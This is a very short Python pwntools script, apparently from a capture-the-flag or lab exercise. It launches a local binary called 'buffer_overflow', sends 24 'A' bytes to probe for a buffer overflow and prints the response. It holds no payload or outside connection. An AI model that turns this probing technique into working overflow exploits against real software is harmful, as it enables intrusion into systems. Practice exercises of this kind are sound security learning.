import pwn 
r = pwn.process("./buffer_overflow", aslr=True)
r.send(b"A"*24)
print(r.readall())